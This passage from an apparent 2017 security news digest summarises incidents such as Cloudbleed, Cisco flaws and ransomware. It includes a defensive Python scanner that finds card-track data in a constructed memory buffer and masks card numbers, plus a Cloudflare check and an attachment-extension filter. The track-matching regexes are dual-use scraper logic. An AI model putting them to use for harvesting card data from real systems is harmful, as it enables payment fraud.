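# Track 1 (format B): %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([^\^?]{2,26})\^(\d{2})(\d{2})\d{3}[^?]*\?")
# Track 2: ;<PAN>=<YYMM><service code><discretionary data>?
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})\d{3}[^?]*\?")


def luhn_ok(pan):
    """Luhn check digit test: the scraper uses it to drop look-alike digit runs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Keep first six and last four digits only (enough to identify BIN and card)."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_buffer(buf):
    """Return findings (with masked PANs) for every Luhn-valid track in the buffer."""
    findings = []
    for m in TRACK1_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            findings.append({"track": 1, "offset": m.start(), "pan": mask_pan(pan),
                             "name": m.group(2).decode(errors="replace").strip(),
                             "expiry": f"{m.group(4).decode()}/{m.group(3).decode()}"})
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            findings.append({"track": 2, "offset": m.start(), "pan": mask_pan(pan),
                             "expiry": f"{m.group(3).decode()}/{m.group(2).decode()}"})
    return findings


def build_sample_memory():
    """Constructed process-memory slice: junk, one card's track 1 and track 2, and a
    decoy whose PAN fails the Luhn check."""
    track1 = b"%B4111111111111111^DOE/JOHN^22121011000000000?"
    track2 = b";4111111111111111=22121011000000000?"
    decoy = b";4111111111111112=2212101?"
    return b"\x00" * 32 + b"GET /pos HTTP" + track1 + b"\xff\x13\x00" + decoy + track2 + b"\x00" * 16


SAMPLE_MEMORY = build_sample_memory()

if __name__ == "__main__":
    for finding in scan_buffer(SAMPLE_MEMORY):
        print(finding)
```

Point-to-point encryption at the card reader is the control that makes this scan come back empty: if the terminal encrypts track data before it reaches the host, the scraper on the host has nothing to match. Note that the output masks PANs deliberately; a detection tool that logs full card numbers creates the very exposure it is looking for.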

-----------------------
NETHERLANDS REVERTS TO HAND-COUNTED VOTES TO QUELL SECURITY FEARS
(The Register, dated 2nd February 2017 author Richard Chirgwin)

Full article [Option 1]:

www.theregister.co.uk/2017/02/02/netherlands_reverting_to_handcounted_votes_to_quell_security_fears/

The Netherlands has decided its vote-counting software isn't ready for prime time, and will revert to hand-counted votes for its March 15 election.

The software's security came under question when Dutch security bod Sijmen Ruwhof told local newscaster RTL Nieuws that the average iPad is more secure than the electoral software, called OSV.

He warned that Windows XP is still used for some installations of the system, and in his own blog notes that known-to-be-dud SHA-1 was also employed. He also claimed that unsecured USB sticks would be used to move electoral data.

In a letter sent to the House of Representatives, Minister of the Interior Dr. Roland Plasterk says votes won't even be entrusted to USB keys: they will be counted at polling stations, with paper reports passed up to the municipality level, then on to aggregating locations, and finally to the country's Electoral Council.

"I've stated that the Cabinet cannot rule out state actors benefiting from influencing the political decision-making process and public opinion in the Netherlands, and deploying means to attempt to achieve this influence", Plasterk's letter says.

-----------------------
TICKING "TIME-BOMB" FAULT WILL RENDER CISCO GEAR USELESS AFTER 18 MONTHS
(The Register, dated 3rd February 2017 author Thomas Claburn)

Full article [Option 1]: www.theregister.co.uk/2017/02/03/cisco_clock_component_may_fail/

Cisco has issued a warning that an electronic component used in versions of its routing, optical networking, security and switch products prior to November 16, 2016 is unreliable - and may fail in the next year and a half, rendering affected hardware permanently inoperable.

"Although the Cisco products with this component are currently performing normally, we expect product failures to increase over the years, beginning after the unit has been in operation for approximately 18 months," Cisco said in its advisory.

"Once the component has failed, the system will stop functioning, will not boot, and is not recoverable."

And without naming names, Cisco said that the clock-signal-generating component is also used by other companies. Expect further notices of this sort from other vendors shortly.

Cisco said it learned about the issue in late November and has worked with the component supplier to fix the faulty part. As a result, currently shipping products are not affected.

----------------------
GOOGLE MISTAKES THE ENTIRE NHS FOR MASSIVE CYBER-ATTACKING BOTNET
(The Register, dated 1st February 2017 author Kat Hall)

Full article [Option 1]: www.theregister.co.uk/2017/02/01/google_mistakes_entire_nhs_for_a_botnet/

Google is blocking access to the entire NHS network, mistaking the amount of traffic it is currently receiving as a cyber attack.

An email from an NHS trust's IT department seen by The Register confirmed that the US search giant has mistaken the current traffic levels for a botnet.

The email headed "Google Access" stated: "Google is intermittently blocking access due to the amount of traffic from NHS Trusts Nationally (This is not being blocked by the IT Department).

"This is causing Google to think it is suffering from a cyber-attack.

"We are advising staff to use an alternative search engine i.e. Bing to bypass this problem.

"If you have 'Chrome' on your desktop the page will display correctly but if you 'should' get a CAPTCHA pop up, please follow the instructions to continue."

The source said they did not know why Google had suddenly decided to block access to the NHS net, but confirmed it was the "go-to resource" for a lot of clinicians.

----------------------
CISCO SOFTWARE FOR ISPs LETS HACKERS HIJACK PEOPLE'S ROUTERS
(The Register, dated 1st February 2017 author Shaun Nichols)

Full article [Option 1]: www.theregister.co.uk/2017/02/01/cisco_remote_access_hole_in_prime_home/

Cisco is advising ISPs and other service providers using its Prime Home system to install a security update immediately - to squash a serious remote execution bug.

Switchzilla says the flaw, which was given a 10.0 CVSS score, could allow an attacker to log into the software as an administrator and remotely take control of thousands upon thousands of customers' home routers, broadband gateways and similar boxes.

"An attacker could exploit this vulnerability by sending API commands via HTTP to a particular URL without prior authentication," Cisco said today. "An exploit could allow the attacker to perform any actions in Cisco Prime Home with administrator privileges."

Note that "administrator" was italicized by the networking giant. Super serious.

Cisco pitches Prime Home as a "solution" for ISPs and connected device vendors, allowing companies to control devices such as ISP-issued cable modems, routers, and set top boxes in subscribers' homes from afar. It uses "Broadband Forum's TR-069 suite of protocols to provision and manage in-home devices."
----------------------

(1st March 2017)


RANSOMWARE SOARS IN 2016, WHILE MALWARE DECLINES
(Computer World, dated 7th February 2017 author Matt Hamblen)

Full article [Option 1]:

www.computerworld.com/article/3166346/security/ransomware-soars-in-2016-while-malware-declines.html

A global cyberthreat report released Tuesday found that 2016 was a mixed bag: malware was down slightly, but ransomware attacks soared, up 167 times the number recorded in 2015.

In addition to that huge increase in ransomware, 2016 saw a new line of cybercrime from a large-scale DDoS attack through internet of things devices. The principal case occurred in October when the Mirai botnet attacked unprotected IoT devices, such as internet-ready cameras, resulting in a DDoS attack on Dyn servers.

The 2016 report, by cybersecurity company SonicWall, looked at data from daily network feeds sent from more than 1 million sensors in nearly 200 countries.

During all of 2016, SonicWall found that unique samples of malware fell to 60 million samples, down from 64 million in 2015, a 6.25 percent decrease. Total malware attempts also fell to 7.87 billion from 8.19 billion, a 4 percent decrease.

However, ransomware-as-a-service (RaaS), where ransomware is provided by cybercriminals to other bad guys as a service, rose, offering quick payoffs to cybercrooks, SonicWall found. Ransomware is malicious software designed to block access to a computer system until a ransom is paid to the attacker.

Ransomware attacks rose from 3.8 million in 2015 to 638 million in 2016, an increase of 167 times year over year. SonicWall theorized that ransomware was easier to obtain in 2016 and that criminals faced a low risk of getting caught or punished.

Ransomware was the "payload of choice for malicious email campaigns and exploits," SonicWall said.

In 2016, the most popular malicious email campaigns were based on ransomware, typically Locky, which was deployed in more than 500 million total attacks throughout the year. No industry was spared: the mechanical and industrial engineering industry got 15% of the ransomware hits, while pharmaceuticals and financial services companies each got 13% and real estate companies got 12%.

During the Mirai botnet surge in November, SonicWall found that the U.S. got 70 percent of the DDoS attacks, followed by Brazil with 14 percent and India with 10 percent.

SonicWall CEO Bill Conner said that for all of 2016, the cyberthreat landscape evolved and shifted. "Cybersecurity is not a battle of attrition. It's an arms race and both sides are proving exceptionally capable and innovative," he said in a statement.

For example, with chip cards used for in-store payments, malware attacks at physical stores declined by 93% from 2014 to 2016, SonicWall said. Chip cards went into wider use in the U.S. in October 2015. However, online card fraud in the U.S. surged more than 42% since late 2015, given the shift of attackers to online, according to some security experts.

(1st March 2017)


CLOUDFLARE LEAKS DATA AS MILLIONS OF WEBSITES EXPOSED TO BUG
(International Business Times, dated 24th February 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/cloudflare-leaks-dating-site-messages-uber-data-millions-websites-exposed-bug-1608401

Cloudflare, the web optimisation and security platform used by over five million websites, has confirmed a massive coding error resulted in the leaking of sensitive data of its customers for months - including passwords, internet cookies and private messages.

The bug impacted big-name brands including 1Password, Uber and dating site OKCupid, and has been blamed on a "memory leakage." Cloudflare said in a technical summary of the flaw that around 1 in every 3,300,000 HTTP requests sent through its system were at risk.

Alongside the noted brands, there is now a running list of potentially impacted domains being published to GitHub. So far, they include patreon.com, uber.com, tfl.gov.uk, medium.com and many more. The count is currently sitting at over four million (4,287,625), however these are not yet confirmed victims.

According to John Graham-Cumming, Cloudflare's chief technology officer (CTO), the number of impacted websites is closer to 3,400. However, a true figure remains unclear at this time. "We identified 3,438 unique domains," Graham-Cumming said.

The most vulnerable period for users was between 13 February and 18 February this year; however, Cloudflare admitted the issue may have been present for up to five months, since September 2016.

The wide-ranging issue was uncovered by Google Project Zero researcher Tavis Ormandy, a well-known software bug hunter in security circles. In a detailed run-down of his discovery, he exposed the shocking scope of the coding snafu, reluctantly labelling it "CloudBleed".

What was leaked by the Cloudflare bug?

"I didn't realise how much of the internet was sitting behind [Cloudflare] until this incident. The examples we're finding are so bad," Ormandy wrote on 19 February.

"I'm finding private messages from major dating sites, full messages from a well-known chat service, online password manager data, frames from adult video sites, hotel bookings," he said. "We're talking full HTTPS requests, client IP addresses, full responses, cookies, passwords, keys, data, everything."

Graham-Cumming said his firm, which worked overtime to release a fix this week, has not discovered "any evidence of malicious exploits" as a result of the bug, but confirmed it impacted HTTP cookies, authentication tokens and unspecified "other sensitive data."

"One obvious piece of information that had leaked was a private key used to secure connections between Cloudflare machines," he said, referring to a private key that secured connections between machines on the firm's own internal network.

What's worse, a large amount of the leaked data was reportedly cached - or saved - by public search engines including Google, Bing and Yahoo. Ormandy said his organisation is trying to clean this up, but described any efforts to do so as "a bandaid."

"Cloudflare customers are going to need to decide if they need to rotate secrets and notify their users based on the facts we know," he noted. The researcher also said he did not know if the bug had been exploited but that it's likely other web crawlers were able to collect the data.

In his notes, Ormandy appeared overall pleased with Cloudflare's response to this disclosure, but said at one point the firm "pointed out" its bug bounty programme as one method of informing them of vital issues. The problem with this, he said, is that the top prize is a t-shirt.

He also described a number of delays on Cloudflare's side, however this is likely explained by the sheer scope of the problem the service was facing. When presented with a copy of the draft notification, he said it "severely downplays the risk to customers."

In his blog post, Graham-Cumming responded: "Our natural inclination was to get news of the bug out as quickly as possible, but we felt we had a duty of care to ensure that search engine caches were scrubbed before a public announcement."

The websites hit by the bug were not notified prior to Ormandy's disclosure which, as expected, has caused many to face instant complaints from concerned customers. Now, some internet-based organisations are being forced to address the issues head-on.

Jeffrey Goldberg, a security expert with 1Password, issued a statement on the incident. He wrote: "No 1Password data is put at any risk through the bug reported about CloudFlare. The security of your 1Password data remains safe and solid."

Meanwhile, on Twitter, encrypted email provider, ProtonMail, said: "We do NOT use Cloudflare, #Cloudbleed does not impact your ProtonMail credentials." Others suggested such bugs are likely to have been exploited, especially by well-funded hackers at the NSA.

---------------------

List of domains using Cloudflare DNS (potentially affected by Cloudbleed HTTPS traffic leak)

https://github.com/pirate/sites-using-cloudflare/

---------------------
HOW TO CHECK IF YOUR DATA IS SAFE AND WHAT TO DO TO KEEP YOUR ACCOUNTS SECURE
(International Business Times, dated 25th February 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/cloudflare-data-leak-how-check-if-your-data-safe-what-do-keep-your-accounts-secure-1608519

A serious security vulnerability within Cloudflare, a security and web optimisation platform used by over five million websites globally, dubbed Cloudbleed, saw millions of websites affected. The security snafu resulted in Cloudflare-protected sites, including Uber, Fitbit and dating site OkCupid, leaking users' personal and sensitive data.

Although Cloudflare and Google, whose Project Zero initiative was responsible for disclosing the security issue, have worked to remove much of the leaked data, it is likely some of it may still remain exposed. However, there are a few simple measures you can take to check if you have been affected by the issue and to ensure that your data is kept safe.

How to check if your data has been affected by Cloudbleed


The first thing you can do to check if your data has been affected by the leak is to check which sites use Cloudflare. Millions of websites use Cloudflare and according to Google Project Zero researcher Tavis Ormandy, an unprecedented portion of the internet is linked to it. "I didn't realise how much of the internet was sitting behind [Cloudflare] until this incident," Ormandy wrote in the report that disclosed the issue.

Users can now check which sites have been affected via a list published on GitHub. Among those listed are Medium, 4chan, Zendesk, London Transport, New York Times and more. According to a report by Motherboard, one can also use the website doesitusecloudflare.com to check if a website was affected by the leak.
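The two pieces of evidence those lists and checkers rely on can be collected by anyone: the response headers a Cloudflare edge adds (a "server: cloudflare" header and a CF-RAY request identifier) and nameservers under ns.cloudflare.com. The block below is an added example, not code from Cloudflare, Google or the article; it parses a raw HTTP response and a list of NS records and reports the reasons for believing a site is fronted by Cloudflare. The sample responses and nameserver names are constructed and the CF-RAY value is a placeholder.

```python
"""Check whether a site is fronted by Cloudflare, from evidence a user can collect:
the HTTP response headers and the domain's NS records.

Added example, not code from Cloudflare, Google or the article. The sample responses
and the nameserver list are constructed; the CF-RAY value is a placeholder.
"""
import re
import urllib.request

CF_HEADER_MARKERS = ("cf-ray", "cf-cache-status")          # headers the Cloudflare edge adds
CF_NS_RE = re.compile(r"\.ns\.cloudflare\.com\.?$", re.I)   # Cloudflare-delegated DNS


def parse_response_headers(raw):
    """Parse the header block of a raw HTTP/1.x response into a lowercase-keyed dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:      # skip the status line
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return headers


def cloudflare_evidence(headers=None, nameservers=()):
    """Return the list of reasons to believe the site is behind Cloudflare (empty if none)."""
    headers = headers or {}
    reasons = []
    if headers.get("server", "").lower() == "cloudflare":
        reasons.append("server header")
    for name in CF_HEADER_MARKERS:
        if name in headers:
            reasons.append(f"{name} header")
    for ns in nameservers:
        if CF_NS_RE.search(ns):
            reasons.append(f"NS {ns}")
    return reasons


def live_headers(url, timeout=10):
    """Fetch response headers for a live check (needs network; not used by the sample)."""
    req = urllib.request.Request(url, method="HEAD",
                                 headers={"User-Agent": "cloudflare-check/0.1"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return {k.lower(): v for k, v in resp.headers.items()}


# Constructed responses: what a Cloudflare-proxied site returns, and a direct origin.
SAMPLE_CF_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Fri, 24 Feb 2017 10:00:00 GMT\r\n"
    "Server: cloudflare\r\n"
    "CF-RAY: 0000000000000000-LHR\r\n"
    "Content-Type: text/html\r\n"
    "\r\n<html></html>"
)
SAMPLE_ORIGIN_RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: nginx/1.10.3\r\nContent-Type: text/html\r\n\r\n"
)

if __name__ == "__main__":
    print(cloudflare_evidence(parse_response_headers(SAMPLE_CF_RESPONSE)))
    print(cloudflare_evidence(parse_response_headers(SAMPLE_ORIGIN_RESPONSE), ["ns1.example.net."]))
```

Two caveats apply to any such check. Nameservers on Cloudflare prove only that Cloudflare hosts the DNS; HTTPS traffic passed through the edge only for records that were proxied, so an NS match overstates exposure. And the headers show today's configuration, not what was in place during the September 2016 to February 2017 window, so a negative result now does not clear a site that was proxied then.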

How to keep your data safe

Change your passwords! Given the vast portion of the internet that used Cloudflare, it still remains unclear as to how many websites may have been affected by the security issue. Keeping that in mind, the simplest way to keep your data safe would be to change your passwords, as a precaution. Changing your passwords is also imperative given that researchers believe that the affected sites may have been leaking data for a while before the issue was detected. This means that leaked data may have potentially made its way into the hands of malicious entities.

Security researcher and former Cloudflare employee Ryan Lackey said in a Medium post that "unless it can be shown conclusively that your data was NOT compromised, it would be prudent to act as if it were."

Use a password manager to generate strong passwords


Changing passwords can be a bother, however, when it comes to cybersecurity, the age old adage of "better to be safe than sorry" truly applies. If you are anything like me, coming up with new and strong passwords and keeping a track of all your accounts' passwords could be as challenging as sticking to a healthy diet while staring at a plateful of chips. This is where setting up a password manager can prove to be a lifesaver.

There are various kinds of password manager software available and most of them have been designed to generate strong and unique passwords for different accounts. The bonus is that the software also keeps a track of all your passwords, so you don't have to tax your memory. All you need is one master password to unlock the software and you'll have the rest at the tips of your fingers whenever necessary.

Use two-factor authentication for all your accounts

Most online communications services and messaging apps encourage users to adopt two-factor authentication, which adds an extra layer of security to all your accounts. This can be useful especially in cases like this, when leaked user data could have potentially landed in the hands of hackers. Two-factor authentication serves as a last line of defence against account compromise and it is highly advisable that you activate the feature in all your accounts.

(1st March 2017)


IT SECURITY REVIEW - JANUARY 2017

-----------------------
NETGEAR ROUTERS AT RISK
(Computer World, dated 31st January 2017 author Lucian Constantin)

Full article [Option 1]:

www.computerworld.com/article/3163489/security/easy-to-exploit-authentication-bypass-flaw-puts-netgear-routers-at-risk.html

For the past half-year, Netgear has been working on fixing a serious and easy-to-exploit vulnerability in many of its routers. And it's still not done.

While Netgear has worked to fix the issue, the list of affected router models increased to 30, of which only 20 have firmware fixes available to date. A manual workaround is available for the rest.

The vulnerability was discovered by Simon Kenin, a security researcher at Trustwave, and stems from a faulty password recovery implementation in the firmware of many Netgear routers. It is a variation of an older vulnerability that has been publicly known since 2014, but this new version is actually easier to exploit.

In January 2014, a researcher found that he could trick the web-based management interface of Netgear WNR1000v3 routers into disclosing the admin's password. The exploit involved passing a numerical token obtained from one script called unauth.cgi to another called passwordrecovered.cgi. Neither of them required authentication to access.

----------------------

EUROPOL, INTERNATIONAL POLICE FORCES DISRUPT ATM CRIME GANG
(Cisco Continuum, dated 30th January 2017)

Full article [Option 1]:

https://continuum.cisco.com/2017/01/30/europol-international-police-forces-disrupt-atm-crime-gang/

Europol announced earlier this month that the Romanian National Police and the Directorate for Investigating Organised Crimes and Terrorism, with the help of Europol agents, disrupted an international crime ring responsible for ATM attacks that stole millions from various banks.

In a unique attack style that combined both online and physical components, hackers targeted ATM systems using the Tyupkin ATM malware, which would manipulate ATM machines and cause them to empty their cash cassettes. According to CSO, the attackers were able to pull off the heists by starting with spear phishing attacks on bank employees, then, once inside the bank's network, moving laterally to infiltrate the ATM network. A mule would then visit a targeted ATM machine and enter a combination on the machine's PIN pad to empty its contents. The process is referred to as "jackpotting."

----------------------

FAKE RANSOMWARE ATTACKS ARE TRICKING BUSINESSES INTO PAYING
(Forbes, dated 27th January 2017 author Lee Mathews)

Full article [Option 1]:

www.forbes.com/sites/leemathews/2017/01/27/fake-ransomware-is-tricking-people-into-paying/#439d1804381c

How terrified are people of losing their data to a ransomware infection? So terrified that they'll pay ransoms even when their computers aren't actually infected.

While Spora might be the sophisticated future of ransomware, cybercriminals have also cooked up a much less sophisticated way to earn easy Bitcoins for their wallets. They're just telling people that they've been victimized by ransomware.

There may never have been a network breach of any kind. No phishing emails with malicious JavaScript files. Just a believable threat sent to the right person and a pervasive fear about losing valuable computer data is enough to get the job done, according to a new Citrix study.

----------------------
HACKERS ARE BOMBARDING THE BANK OF CANADA WITH CYBER ATTACKS
(Financial Post, dated 26th January 2017 author Claire Brownwell)

Full article [Option 1]:

http://business.financialpost.com/fp-tech-desk/hackers-bombard-the-bank-of-canada-with-cyberattacks?__lsa=25c8-a886

Employees at the Bank of Canada in November 2015 were bombarded with 25,000 similar, innocuous-looking emails.

The messages came in both official languages, politely asking recipients to review an invoice in an attached Microsoft Word document. The document was armed with code that would attempt to install a colourfully named program - putinanalking.exe - carrying malware designed to steal banking credentials.

Thanks to the bank's cybersecurity defences, the vast majority of those emails were filtered out before they reached their intended targets. For the 33 users who did open the emails and attachments, a second layer of the bank's cybersecurity system kicked in, preventing the malware from transmitting any information to the hackers.

The bank's employees, however, were not as reliable. Five of the 33 duped users opened the email and attachment even after the bank sent out a notification specifically warning them not to.
-----------------------
GOOGLE'S BIG CRACKDOWN : 1.7bn BAD ADS AXED
(ZDNET, dated 26th January 2017 author Liam Tung)

Full article [Option 1]:

www.zdnet.com/article/googles-big-crackdown-1-7-billion-bad-ads-axed-plus-bans-for-200-fake-news-sites/

Google has released its 2016 Bad Ads report, to show how serious it is about combating deviants who abuse its massive ad network, from fraudulent advertisers to phony news sites.

The company says it axed 1.7 billion bad ads in 2016, just over double the 780 million it took down in 2015 for violating its various policies.

Last year Google upgraded its automated systems, which helped it detect and disable 112 million ads designed to trick users, up 600 percent on last year. It also took down 68 million ads that violated its healthcare rules, 17 million illegal gambling ads, and 80 million misleading, shocking and deceptive ads.

-----------------------
RUSSIAN HACKER HAD ACCESS TO A UK TELEVISION STATION FOR ALMOST A YEAR
(International Business Times, dated 26th January 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/russia-linked-fancy-bear-hackers-had-access-uk-television-station-almost-year-1603226

The same hacking group that targeted the US political system in the run-up to the country's presidential election last year was able to infiltrate the computer systems of a UK television network for almost a year, security experts have revealed.

The network has not been named for legal reasons, and likely due to the strict non-disclosure agreements surrounding breach probes. Yet analysts from SecureWorks, a cybersecurity firm, say hackers gained access in July 2015 and remained undetected for up to 12 months.

----------------------
GMAIL WILL BLOCK JAVASCRIPT ATTACHMENTS, A COMMON SOURCE OF MALWARE
(Computer World, dated 26th January 2017 author Lucian Constantin)

Full article [Option 1]:

www.computerworld.com/article/3161898/security/gmail-will-block-javascript-attachments-a-common-source-of-malware.html

Starting Feb. 13, Google will no longer allow JavaScript attachments on its Gmail service, killing one of the main methods of malware distribution over the past two years.

Users will no longer be able to attach .JS files to emails in Gmail, regardless of whether they attach them directly or they include them in archives like .gz, .bz2, .zip or .tgz. For those rare cases when such files need to be shared via email, users can upload them to a storage service like Google Drive and then share the link.

The .JS file extension will be added to an existing list of other banned file attachments that includes: .ADE, .ADP, .BAT, .CHM, .CMD, .COM, .CPL, .EXE, .HTA, .INS, .ISP, .JAR, .JSE, .LIB, .LNK, .MDE, .MSC, .MSP, .MST, .PIF, .SCR, .SCT, .SHB, .SYS, .VB, .VBE, .VBS, .VXD, .WSC, .WSF and .WSH. Most of these file types have long been abused by cybercriminals to send malware via email.
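As an added illustration of the rule described above (example code, not Google's own filter), the following applies the quoted extension list to an attachment and, recursively, to the members of any .zip, .gz, .bz2 or .tgz archive it is packed in. The sample attachments are constructed in memory; the depth and size limits are assumptions chosen for this example.

```python
"""Attachment filter modelled on the Gmail rule: block a file whose extension is
on the banned list, even when it is packed inside an archive. Added example."""
import bz2
import gzip
import io
import os
import tarfile
import zipfile

# Banned extensions quoted in the article, plus the newly added .JS.
BLOCKED_EXTENSIONS = {
    ".ade", ".adp", ".bat", ".chm", ".cmd", ".com", ".cpl", ".exe", ".hta",
    ".ins", ".isp", ".jar", ".js", ".jse", ".lib", ".lnk", ".mde", ".msc",
    ".msp", ".mst", ".pif", ".scr", ".sct", ".shb", ".sys", ".vb", ".vbe",
    ".vbs", ".vxd", ".wsc", ".wsf", ".wsh",
}
MAX_DEPTH = 3                 # assumed limit: nested archives deeper than this are refused
MAX_MEMBER_BYTES = 50 << 20   # assumed limit: refuse members that would expand past 50 MiB


def blocked_name(filename):
    """True if the name ends in a banned extension, compared case-insensitively."""
    return os.path.splitext(filename)[1].lower() in BLOCKED_EXTENSIONS


def find_blocked(filename, data, depth=0):
    """Return the paths (archive members included) that carry a banned extension.

    Archives are opened in memory and checked recursively, so a .js inside a
    .zip inside a .zip is still caught. Anything that cannot be opened safely
    (corrupt, too deep, too large) is reported as a hit so the caller fails
    closed rather than letting an unscanned file through.
    """
    hits = [filename] if blocked_name(filename) else []
    lower = filename.lower()
    is_tar = lower.endswith((".tgz", ".tar.gz", ".tar.bz2", ".tar"))
    if not (is_tar or lower.endswith((".zip", ".gz", ".bz2"))):
        return hits
    if depth >= MAX_DEPTH:
        return hits + [f"{filename} (nesting too deep)"]
    try:
        if is_tar:
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
                for m in tf.getmembers():
                    if not m.isfile():
                        continue
                    if m.size > MAX_MEMBER_BYTES:
                        hits.append(f"{filename}/{m.name} (too large)")
                        continue
                    inner = tf.extractfile(m).read()
                    hits += [f"{filename}/{h}" for h in find_blocked(m.name, inner, depth + 1)]
        elif lower.endswith(".zip"):
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    if info.is_dir():
                        continue
                    if info.file_size > MAX_MEMBER_BYTES:
                        hits.append(f"{filename}/{info.filename} (too large)")
                        continue
                    hits += [f"{filename}/{h}"
                             for h in find_blocked(info.filename, zf.read(info), depth + 1)]
        else:
            # Single-file compression (.gz / .bz2): strip the suffix and check what is inside.
            inner = gzip.decompress(data) if lower.endswith(".gz") else bz2.decompress(data)
            hits += [f"{filename}/{h}"
                     for h in find_blocked(filename.rsplit(".", 1)[0], inner, depth + 1)]
    except (zipfile.BadZipFile, tarfile.TarError, OSError, EOFError, ValueError):
        hits.append(f"{filename} (unreadable archive)")
    return hits


def make_zip(members):
    """Build an in-memory zip from {name: bytes}; used only to construct sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


def make_tgz(members):
    """Build an in-memory .tgz from {name: bytes}; used only to construct sample input."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, content in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def sample_verdicts():
    """Constructed attachments (not real mail), returned as {name: blocked paths}."""
    inner = make_zip({"setup.exe": b"MZ...", "notes.txt": b"hello"})
    samples = {
        "report.pdf": b"%PDF-1.4 ...",
        "invoice.JS": b"var x = 1;",
        "docs.zip": make_zip({"readme.txt": b"ok", "invoice.js": b"var x=1;", "inner.zip": inner}),
        "backup.tgz": make_tgz({"scripts/run.vbs": b"MsgBox 1", "data.csv": b"a,b"}),
        "payload.js.gz": gzip.compress(b"alert(1)"),
        "broken.zip": b"not really a zip",
    }
    return {name: find_blocked(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, hits in sample_verdicts().items():
        print(f"{name:15} -> {'BLOCK ' + ', '.join(hits) if hits else 'allow'}")
```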

----------------------
CHROME AND FIREFOX WILL WARN USERS ABOUT SENDING SENSITIVE DATA OVER INSECURE CONNECTIONS
(The Verge, dated 26th January 2017 author James Vincent)

Full article [Option 1]:

www.theverge.com/2017/1/26/14396130/http-https-insecure-connections-chrome-firefox

Google and Mozilla are taking new steps to warn internet users about websites vulnerable to hacking. In the latest updates to the Chrome and Firefox web browsers (versions 56 and 51 respectively), users will be told if they're submitting sensitive information over insecure HTTP connections - rather than the safer HTTPS protocol. These warnings have already been deployed in beta versions of the browsers, but their move to the primary version will reach a great number of users.

----------------------
RUSSIA ARRESTS KASPERSKY CYBERCRIME HUNTER IN "TREASON PROBE"
(Forbes, dated 25th January 2017 author Thomas Fox-Brewster)

Full article [Option 1]:

www.forbes.com/sites/thomasbrewster/2017/01/25/russia-kaspersky-treason-arrest/#302d9aef4a68

One of Russia's most successful cybercrime investigators and hacker hunter at one of the world's biggest security companies, Kaspersky Lab, has been arrested by Russian law enforcement as part of a probe into possible treason, according to reports. Kaspersky has confirmed incident response chief Ruslan Stoyanov was at the center of an investigation, but could not offer more details.

"This case is not related to Kaspersky Lab. Ruslan Stoyanov is under investigation for a period predating his employment at Kaspersky Lab," a Kaspersky spokesperson said in an emailed statement. "We do not possess details of the investigation. The work of Kaspersky Lab's Computer Incidents Investigation Team is unaffected by these developments."

----------------------
CYBER CRIMINALS AVOID FRAUD WITHIN THEIR OWN RANKS WITH NEW SITE
(Computer World, dated 24th January 2017 author Michael Kan)

Full article [Option 1]:

www.computerworld.com/article/3161007/security/cyber-criminals-avoid-fraud-within-their-own-ranks-with-new-site.html

Sometimes it's not easy being a cyber criminal. In addition to law enforcement and private security companies, cyber thieves have to battle fraudsters out to beat them at their own game, but a website offers to help.

Ripper.cc has been maintaining a database of known "rippers" or scammers since June last year and security firm Digital Shadows, which has been investigating it, says it may help online black markets flourish.

Fraud is a nagging problem in the cyber criminal world, according to Digital Shadows. Although some hackers believe in honor amongst thieves, others are peddling bogus goods, such as stolen credit card numbers or user credentials that turn out to be fake.

The cost of doing business in this risky climate means hackers are saddled with a "ripper tax," Digital Shadows said in a Tuesday blog post. "This in turn, slows the market down and makes further cyberattacks less lucrative."

----------------------
MICROSOFT TO REPLACE WINDOW DEFENDER SECURITY CENTER IN APRIL
(Computer World, dated 24th January 2017 author Andy Patrizio ?)

Full article [Option 1]:

http://www.computerworld.com/article/3161069/security/microsoft-to-release-windows-defender-security-center-in-april.html

Microsoft has announced that as part of the Creators Update coming in April, it will introduce a new security service called Windows Defender Security Center, which is designed to act as a dashboard for all of your security features, including third-party security. The Security Center is already available to Windows Insiders using preview builds of Windows 10.

Though Windows Defender has never been a top-flight performer in detecting malware compared to vendors like Trend Micro and Kaspersky (see the latest AV Comparatives in PDF format), Microsoft has stuck with it, and it does make for a decent second line of defense. With the Security Center, Microsoft is expanding beyond mere malware detection into overall system security.
----------------------
ST. LOUIS PUBLIC LIBRARY COMPUTERS HACKED FOR RANSOM
(CNN TECH, dated 19th January 2017 author Jose Pagliery)

Full article [Option 1]:

http://money.cnn.com/2017/01/19/technology/st-louis-public-library-hack/

Hackers have infected every public computer in the St. Louis Public Library system, stopping all book borrowing and cutting off internet access for those who rely on the library's computers.

The computer system was hit by ransomware, a particularly nasty type of computer virus that encrypts computer files.

This form of attack renders computers unusable -- unless victims are willing to pay an extortion fee and obtain a key to unlock the machines.

According to the library, hackers demanded $35,000 in the electronic currency Bitcoin -- but the library refuses to pay. Instead, it'll wipe the entire computer system and reset it, which could take days or weeks.

